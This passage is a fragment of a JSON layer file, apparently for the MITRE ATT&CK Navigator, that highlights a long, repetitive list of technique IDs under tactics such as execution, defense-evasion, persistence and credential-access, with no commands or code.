"comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1049", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "defense-evasion", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "persistence", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1138", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0045", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1018", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1046", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1118", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1121", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1123", "tactic": "collection", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T0007", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0009", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1081", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1220", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0035", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1123", "tactic": "collection", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1082", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", 
"tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1136", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1042", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", 
"tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0049", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0049", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 
"T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "initial-access", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1193", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0016", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1489", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": 